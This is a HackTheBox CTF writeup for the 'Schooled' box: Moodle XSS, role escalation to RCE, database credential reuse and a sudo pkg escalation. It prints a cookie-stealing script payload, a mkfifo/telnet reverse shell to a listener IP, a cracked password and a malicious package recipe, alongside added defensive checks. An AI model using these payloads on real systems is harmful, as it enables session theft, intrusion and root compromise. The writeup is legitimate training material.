Schooled – Hackthebox Writeup

Initial Enumeration

The foothold of this box was particularly interesting, as it required an enumeration tactic I don’t typically use on CTFs: subdomain scanning.

To start this box up, like all the others, I ran an nmap scan on it. What I found wasn’t all that interesting: just SSH and an Apache web server.

So after that scan I decided to check the website out. There really wasn’t anything all that interesting about that either. It just looked like a template.

So after exploring the site to no avail, I decided to fire up ffuf to see if there were any interesting files or directories to be found. Unfortunately, yet again, there was nothing of interest. At this point I was starting to get a little frustrated at the lack of usable information, but I wasn’t out of luck quite yet; there were still a couple of things I could try. One was running a more thorough nmap scan: unless told otherwise, nmap only scans the 1000 most common ports, so having it scan every port can yield some interesting information. This can be done by passing “-” as the port option, as shown below.

nmap -p- -T5 -A schooled.htb

I did find that port 33060 was open, which is supposedly for mysql-x, but after a lot of searching I determined that it was likely just a red herring meant to throw people off.

After that minor setback I finally decided to try a subdomain scan using the command below.

gobuster vhost --wordlist /usr/share/wordlists/subdomains-10000.txt -u http://schooled.htb/

Lo and behold, I finally struck gold!

I had no idea what Moodle was, so I turned to Google yet again. I learned that it is an open source education management system created to help with online learning. Apparently the platform had struggled with XSS vulnerabilities in the past; this information will be important later on. After learning what it was I checked the site out and was greeted with a list of classes and teachers.

Attempting to click on any of the links brought me to a login page. So I created an account and found that I was able to enroll in the mathematics class, but not any of the others. Enrolling in the class gave me access to read the class announcements; the most interesting one explained that the teacher would be checking all enrolled students’ “MoodleNet” profiles to ensure they are set up.

After seeing this, my first thought was that perhaps there was a stored XSS vulnerability in user profiles that would allow me to steal the teacher’s session key and thus log in as him. It turns out that was indeed the case, and the vulnerability was assigned CVE-2020-25267. So I immediately set out to exploit this. I did so by going to my profile and setting my MoodleNet profile to:

<script>document.location="http://10.10.14.7?c="+document.cookie;</script>

This approach is hardly inconspicuous: the victim will immediately notice that something is wrong, as instead of seeing my Moodle profile he will be sent to my PHP server. A much quieter approach would be to create an image and set its source URL to the attacker’s server, sending the session key through that. But considering this is just a CTF, it doesn’t really matter.
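Two defensive checks that break this chain, written as an added example (it is not Moodle’s code and not part of the original writeup): validating and output-escaping the MoodleNet profile field, and auditing the session cookie’s flags, since document.cookie can only read cookies that lack HttpOnly. The cookie name MoodleSession and the exact URL rules are assumptions.

```python
import html
from http.cookies import SimpleCookie
from urllib.parse import urlsplit

# Characters a legitimate profile URL never needs, but which are required to
# break out of an attribute or open a tag.
MARKUP_CHARS = set('<>"\'')

def validate_moodlenet_profile(value: str):
    """Accept an empty value or a plain absolute http(s) URL. Returns (ok, reason).
    Validation on write is the first layer; the render step below is the second."""
    value = value.strip()
    if not value:
        return True, "empty"
    if MARKUP_CHARS & set(value):
        return False, "markup characters in profile field"
    parts = urlsplit(value)
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return False, "not an absolute http(s) URL"
    return True, "ok"

def render_profile_link(value: str) -> str:
    """Escape on output too, so a value that reached the database before any
    validation existed is emitted as inert text rather than live markup."""
    safe = html.escape(value, quote=True)
    return f'<a href="{safe}">{safe}</a>'

def audit_session_cookie(set_cookie_header: str, name: str = "MoodleSession"):
    """Return the protective flags missing from the session cookie. Without
    HttpOnly the cookie is readable from document.cookie, which is exactly what
    the stored payload relies on. (The cookie name is an assumption.)"""
    jar = SimpleCookie()
    jar.load(set_cookie_header)
    if name not in jar:
        return [f"{name} not present"]
    morsel = jar[name]
    flags = (("HttpOnly", "httponly"), ("Secure", "secure"), ("SameSite", "samesite"))
    return [label for label, key in flags if not morsel[key]]

if __name__ == "__main__":
    # Constructed sample input: the payload from the writeup and a bare cookie.
    payload = '<script>document.location="http://10.10.14.7?c="+document.cookie;</script>'
    print(validate_moodlenet_profile(payload))  # (False, 'markup characters in profile field')
    print(render_profile_link(payload))         # '&lt;script&gt;...' with no live tag
    print(audit_session_cookie("MoodleSession=abc; Path=/"))  # ['HttpOnly', 'Secure', 'SameSite']
```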

After setting my MoodleNet profile I ran a PHP server, which, looking back, was pretty unnecessary; I easily could have just used netcat to listen on port 80, but it worked in the end so it doesn’t matter all that much. I ran the server with this command:

sudo php -S 0.0.0.0:80

So now in theory whenever the teacher “checks” my profile his session key will be sent to my server.

Bingo! It worked like a charm. So, now that I have access to a teacher’s account, what can I do? It turns out there is a vulnerability affecting the version in use that allowed a teacher to change their role from teacher to manager. Then, using this manager role, plugins can be uploaded to the server to gain RCE. The vulnerability in question was CVE-2020-14321. Luckily a couple of proof-of-concept scripts already existed to ease the exploitation process. The one I used was this. Armed with the knowledge that the system was FreeBSD, I was able to find a reverse shell to get into the system:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet 10.10.14.7 2345 > /tmp/f

Getting User Access

Not going to lie, this next part took me way too long to figure out, despite it being relatively simple.

After a little enumeration I discovered a config.php file in the /usr/local/www/apache24/data/moodle directory.

Within this file I found credentials for a MySQL server:

Having acquired those credentials, I naturally tried to log in using the mysql command. Unfortunately for me the mysql binary wasn’t in /usr/bin, so the command didn’t work. For whatever reason, instead of searching for the binary elsewhere, I gave up on the idea and continued to sift through all the files, to no avail. After doing so for hours I finally decided to just create a PHP file to execute SQL queries, which again I’m not really sure why I did when I could have just found the binary at /usr/local/bin/mysql, but it ended up working out in the end anyway. So now, with the ability to scour the database, I started searching for interesting tables. One of them was the mdl_users table, which contained users and password hashes; exactly what I was looking for. There were a lot of users, but only one piqued my interest, as its name was jamie, and this name just happened to be listed in /etc/passwd.

So I ran this hash through hashid and discovered it was a bcrypt hash. Using this knowledge I was able to run it through John the Ripper and find that Jamie’s password was: !QAZ2wsx

From there I was able to ssh into the box as Jamie and grab the user flag.

Privilege Escalation To Root

Getting root was relatively easy compared to user.

I first did a little enumeration and learned that I was able to run two commands using sudo:

It turns out there is a GTFOBins entry for getting root in a situation like this. Apparently, when installing a package, said package can run a script before installation, and if the install command is run using sudo then the script will have root privileges. Exploiting this was trivial. I simply created a package on my machine with fpm using these commands:

echo "cat /root/root.txt" > f.sh
fpm -n f -s dir -t freebsd -a all --before-install f.sh .

I then copied the package over to the box and installed it…

and just like that we have the root flag.
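A defender-side check for this escalation path, added here as an example (not the box author’s or the pkg project’s code): inspect a package’s manifest for install hooks before anyone runs the installer under sudo, and refuse packages that carry them unless explicitly allowed. It assumes a FreeBSD-style .txz whose +MANIFEST is JSON with a top-level "scripts" object (the format this example assumes fpm -t freebsd produces) and builds a constructed fixture to run against.

```python
import io
import json
import os
import tarfile
import tempfile

# Hooks pkg(8) runs with the installer's privileges, i.e. as root under sudo.
HOOK_KEYS = ("pre-install", "post-install", "pre-deinstall", "post-deinstall")

def package_hooks(pkg_path: str) -> dict:
    """Return {hook: script} for every hook declared in the package's +MANIFEST.
    Assumes a JSON manifest with a top-level "scripts" object, as this example
    assumes fpm -t freebsd emits; a UCL manifest would need a UCL parser."""
    with tarfile.open(pkg_path, "r:*") as tar:
        try:
            manifest = json.load(tar.extractfile("+MANIFEST"))
        except KeyError:            # no manifest at all: nothing can run
            return {}
    scripts = manifest.get("scripts") or {}
    return {k: v for k, v in scripts.items() if k in HOOK_KEYS and v.strip()}

def install_allowed(pkg_path: str, allow_hooks: bool = False):
    """Policy gate: refuse any package carrying hook scripts unless explicitly
    allowed, and report the first line of each so a reviewer sees what would run."""
    hooks = package_hooks(pkg_path)
    if hooks and not allow_hooks:
        return False, [f"{k}: {v.strip().splitlines()[0]}" for k, v in hooks.items()]
    return True, []

def build_sample_package(pre_install: str = "") -> str:
    """Constructed fixture, not real fpm output: a minimal .txz with a JSON
    +MANIFEST in a fresh temp dir, optionally carrying a pre-install hook."""
    manifest = {"name": "f", "version": "1.0", "origin": "local/f", "arch": "freebsd:*"}
    if pre_install:
        manifest["scripts"] = {"pre-install": pre_install}
    data = json.dumps(manifest).encode()
    path = os.path.join(tempfile.mkdtemp(), "f-1.0.txz")
    with tarfile.open(path, "w:xz") as tar:
        info = tarfile.TarInfo("+MANIFEST")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return path

if __name__ == "__main__":
    # The hook body is the one-liner the writeup puts in f.sh.
    print(install_allowed(build_sample_package("cat /root/root.txt\n")))
    # (False, ['pre-install: cat /root/root.txt'])
```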

Conclusion

Overall this was probably one of the more frustrating boxes for me; it took me a lot more time than many of the others I have done, and I nearly quit midway through. Luckily I stuck with it, and it was definitely one of the more rewarding boxes I have done. It taught me a lot and really tested my commitment. So thank you TheCyberGeek for creating such a great box!
